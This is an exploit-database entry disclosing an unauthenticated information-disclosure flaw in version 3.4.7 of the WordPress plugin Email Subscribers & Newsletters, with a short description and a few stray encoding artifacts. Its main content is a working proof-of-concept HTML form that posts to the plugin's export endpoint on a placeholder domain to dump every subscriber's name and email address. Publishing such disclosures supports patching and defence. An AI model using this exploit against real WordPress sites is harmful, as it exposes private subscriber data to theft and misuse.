WordPress Email Subscribers And Newsletters 3.4.7 Information Disclosure

2018-01-24T00:00:00
ID PACKETSTORM:146070
Type packetstorm
Reporter ThreatPress Security
Modified 2018-01-24T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure  
# Google Dork:  
# Date: 2018-01-23  
# Exploit Author: ThreatPress Security  
# Vendor Homepage: http://icegram.com/  
# Software Link: https://wordpress.org/plugins/email-subscribers/  
# Version: 3.4.7  
# Tested on: WordPress 4.9.2  
# CVE :  
  
Email Subscribers & Newsletters, a popular WordPress plugin, has just fixeda" the vulnerability that allows an unauthenticated user to download the entire subscriber a"list with names and e-mail addresses.  
  
Exploit:  
  
<form action="http://DOMAINTOTEST.com/?es=export" method="post">  
<input type="text" name="option" value="view_all_subscribers" />  
<input type="submit" value="Exploit" />  
</form>  
  
  
`